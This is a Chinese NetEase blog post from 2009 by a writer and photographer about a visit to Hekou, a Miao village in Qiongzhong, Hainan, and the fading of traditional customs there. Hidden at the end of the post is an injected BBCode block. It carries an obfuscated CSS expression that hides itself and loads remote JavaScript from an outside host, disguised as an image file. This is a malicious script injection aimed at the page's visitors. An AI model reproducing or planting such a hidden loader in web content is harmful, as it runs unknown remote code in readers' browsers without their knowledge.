注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

刚峰看世界

不一样的角度不一样的世界!自由作家摄影师

 
 
 

日志

 
 
关于我

刚峰,知名网络作家\摄影师。曾任(海南侨报《乡缘》杂志法人代表总编辑)。2009年当选腾讯全国网络意见领袖

知名网络作家\摄影师。曾任(海南侨报《乡缘》杂志法人代表总编辑)。2009年当选腾讯全国网络意见领袖,2011年被腾讯评为网年度最具影响力十大博客,全国昆明博客笔会金奖获得者。 欢迎指教,欢迎合作。 联系邮址:<117550199@qq.com>

网易考拉推荐
 
 

苗寒,远逝的风情   

2009-03-26 22:11:27|  分类: 黎苗风情 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
    苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

苗寒,远逝的风情  - 刚峰先生 - 天涯横呤

三月二十二日,上午十点左右,我们一行到达了琼中中平镇,河口村。
  河口村又名双田村,是一个苗黎杂居的村落,有四百多人口。苗族占90%以上。
  据给我们带路的向导,该村民办学校的老师告诉我,村边是农垦的一家农场,当年,政府将散居在山岭中的苗民,迁居于此而成村。
  琼中是海南唯一的黎苗自治县,居住于琼中的苗族占海南绝大多数。
  当然有关苗族的来历,各大网站都有介绍,在下就不赘叙。

  第一次这么正儿八劲地来苗寨采风,可村落里早已没有我要寻找的风景了。
  不仅是在琼中,就是海南其它少数民族市县,保存下来的黎苗风情也不多见了……
  谈不是是一种失落,当然也不是一种兴奋。
  作为海南历史文化的网络写作者,我来苗村黎寨就是想来寻找远逝的民风民情,就是想借助网络将我所采集到的原汗原味的黎苗风情传递给网友。
  可如今,展现在我眼帘中的这个河口村的风光,与海南其它汉族村落的风貌没有什么差别。
  村中基本上是瓦房,原来的茅屋基本上都不见了。
  屋前房后,几乎,每家每户都装有卫星天线。
  向导,是一个本份的老师,在乡村从事二十余年,也是本村德高望重之人。他也是哲断兄他们上次扫村结识的朋友。
  向导说,村里苗民的收入基本上是靠种植业,以橡胶为主,只是今年以来橡胶的价格不太高,从过去几十块钱跌落到现在的八元左右。
  也许是我们一行人带着长枪短炮浩浩荡荡进村,立即引起了村民的轰动,也许村里过节都没有这么热闹过,老少妇儒皆出门观看,特别是一些村里的小孩,充当我们的模特,在村里最高处,在阳光灿烂下,翘起小屁股,快乐开心地让我们尽情拍照。
  既然,古朴的苗寨早已塌圯在现代文明的进化中,那么,就让村里的妇儒配合一下,演绎一下苗村过年过节才能看到的风情吧。

  于是,在哲断兄的提议下,在向导的帮助下,村里的妇女穿上苗服,充当我的们业余模特。
  于是,屋檐下、树林中、水溪畔,苗妹苗妈苗姑苗婆都进了我们的镜头,让我们这些第一次从海口城市里来到琼中山区的摄影人,多少感觉到了苗乡土人情,感受到苗人的朴质与憨厚。
  特别是,在表演苗族早年捣谷农活场景,起先是二位穿着皮鞋的苗妹,但手法生熟,让在一边观看的一位七十多岁的苗婆忍俊不禁地笑了起来。当阿婆亲自表演且一边捣一边唱着消逝久远的苗歌时,我的镜头不停地按着,可惜我没有带录音机,阿婆的苗音我也听不懂,但那流传了千年,发自琼中山区苗民在耕种中特有的民歌声调,却让我有了一种触动。
  也许触景生情,也许是为远逝的风情叹息,也许什么都不是,只是文人骨子里特有的兴情中的敏感,对于远去的风情,而寄予的一种祭祀吧……
  
  如今的苗寨,也只有老人们还记得起一些久远的苗歌了,还保留了一些苗族人的生活风俗。三十以下的苗妹们,对远逝先祖们遗留下的风情,也只有在阿婆的口中偶尔听起。
  时代在进步,可那远逝的风情与民俗,更让我觉得倍感弥珍……[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  评论这张
 
阅读(365)| 评论(4)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017